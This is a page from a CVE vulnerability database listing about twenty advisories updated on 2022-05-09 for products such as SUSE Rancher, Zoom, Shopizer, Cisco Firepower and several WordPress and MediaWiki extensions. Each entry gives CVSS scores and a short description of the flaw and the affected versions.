Total
210374 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2021-36784 | 1 Suse | 1 Rancher | 2022-05-09 | 6.5 MEDIUM | 7.2 HIGH |
| A Improper Privilege Management vulnerability in SUSE Rancher allows users with the restricted-admin role to escalate to full admin. This issue affects: SUSE Rancher Rancher versions prior to 2.5.13; Rancher versions prior to 2.6.4. | |||||
| CVE-2022-1300 | 1 Trumpf | 3 Trutops Boost, Trutops Fab, Trutops Monitor | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL |
| Multiple Version of TRUMPF TruTops products expose a service function without necessary authentication. Execution of this function may result in unauthorized access to change of data or disruption of the whole service. | |||||
| CVE-2020-23618 | 1 Xtendtech | 1 Voice Logger | 2022-05-09 | 4.3 MEDIUM | 6.1 MEDIUM |
| A reflected cross site scripting (XSS) vulnerability in Xtend Voice Logger 1.0 allows attackers to execute arbitrary web scripts or HTML, via the path of the error page. | |||||
| CVE-2022-22783 | 1 Zoom | 2 Zoom On-premise Meeting Connector Controller, Zoom On-premise Meeting Connector Mmr | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH |
| A vulnerability in Zoom On-Premise Meeting Connector Controller version 4.8.102.20220310 and On-Premise Meeting Connector MMR version 4.8.102.20220310 exposes process memory fragments to connected clients, which could be observed by a passive attacker. | |||||
| CVE-2022-28481 | 1 Csv-safe Project | 1 Csv-safe | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL |
| CSV-Safe gem < 3.0.0 doesn't filter out special characters which could trigger CSV Injection. | |||||
| CVE-2022-22782 | 1 Zoom | 4 Meetings, Rooms For Conference Rooms, Vdi Windows Meeting Clients and 1 more | 2022-05-09 | 6.6 MEDIUM | 7.1 HIGH |
| The Zoom Client for Meetings for Windows prior to version 5.9.7, Zoom Rooms for Conference Room for Windows prior to version 5.10.0, Zoom Plugins for Microsoft Outlook for Windows prior to version 5.10.3, and Zoom VDI Windows Meeting Clients prior to version 5.9.6; was susceptible to a local privilege escalation issue during the installer repair operation. A malicious actor could utilize this to potentially delete system level files or folders, causing integrity or availability issues on the user’s host machine. | |||||
| CVE-2022-24372 | 1 Linksys | 2 Mr9600, Mr9600 Firmware | 2022-05-09 | 4.9 MEDIUM | 4.6 MEDIUM |
| Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share. | |||||
| CVE-2022-22781 | 1 Zoom | 1 Meetings | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH |
| The Zoom Client for Meetings for MacOS (Standard and for IT Admin) prior to version 5.9.6 failed to properly check the package version during the update process. This could lead to a malicious actor updating an unsuspecting user’s currently installed version to a less secure version. | |||||
| CVE-2022-29585 | 1 Mahara | 1 Mahara | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH |
| In Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0, a site using Isolated Institutions is vulnerable if more than ten groups are used. They are all shown from page 2 of the group results list (rather than only being shown for the institution that the viewer is a member of). | |||||
| CVE-2022-24887 | 1 Nextcloud | 1 Talk | 2022-05-09 | 5.8 MEDIUM | 6.1 MEDIUM |
| Nextcloud Talk is a video and audio conferencing app for Nextcloud, a self-hosted productivity platform. Prior to versions 11.3.4, 12.2.2, and 13.0.0, when sharing a Deck card in conversation, the metaData can be manipulated so users can be tricked into opening arbitrary URLs. This issue is fixed in versions 11.3.4, 12.2.2, and 13.0.0. There are currently no known workarounds. | |||||
| CVE-2022-27905 | 1 Controlup | 1 Controlup | 2022-05-09 | 9.0 HIGH | 7.2 HIGH |
| In ControlUp Real-Time Agent before 8.6, an unquoted path can result in privilege escalation. An attacker would require write permissions to the root level of the OS drive (C:\) to exploit this. | |||||
| CVE-2022-23061 | 1 Shopizer | 1 Shopizer | 2022-05-09 | 5.5 MEDIUM | 6.5 MEDIUM |
| In Shopizer versions 2.0 to 2.17.0 a regular admin can permanently delete a superadmin (although this cannot happen according to the documentation) via Insecure Direct Object Reference (IDOR) vulnerability. | |||||
| CVE-2022-24935 | 1 Lexmark | 2 Lexmark, Lexmark Firmware | 2022-05-09 | 5.0 MEDIUM | 7.5 HIGH |
| Lexmark products through 2022-02-10 have Incorrect Access Control. | |||||
| CVE-2022-28056 | 1 Shopxo | 1 Shopxo | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL |
| ShopXO v2.2.5 and below was discovered to contain a system re-install vulnerability via the Add function in app/install/controller/Index.php. | |||||
| CVE-2022-23060 | 1 Shopizer | 1 Shopizer | 2022-05-09 | 3.5 LOW | 4.8 MEDIUM |
| A Stored Cross Site Scripting (XSS) vulnerability exists in Shopizer versions 2.0 through 2.17.0, where a privileged user (attacker) can inject malicious JavaScript in the filename under the “Manage files” tab | |||||
| CVE-2022-0952 | 1 Sitemap Project | 1 Sitemap | 2022-05-09 | 6.8 MEDIUM | 8.8 HIGH |
| The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog. | |||||
| CVE-2022-29969 | 1 Mediawiki | 1 Rss For Mediawiki | 2022-05-09 | 4.3 MEDIUM | 6.1 MEDIUM |
| The RSS extension before 2022-04-29 for MediaWiki allows XSS via an rss element (if the feed is in $wgRSSUrlWhitelist and $wgRSSAllowLinkTag is true). | |||||
| CVE-2022-27962 | 1 Bluecms Project | 1 Bluecms | 2022-05-09 | 7.5 HIGH | 9.8 CRITICAL |
| Bluecms 1.6 has a SQL injection vulnerability at cooike. | |||||
| CVE-2022-20629 | 1 Cisco | 1 Firepower Management Center | 2022-05-09 | 3.5 LOW | 5.4 MEDIUM |
| Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. | |||||
| CVE-2022-20628 | 1 Cisco | 1 Firepower Management Center | 2022-05-09 | 3.5 LOW | 5.4 MEDIUM |
| Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. | |||||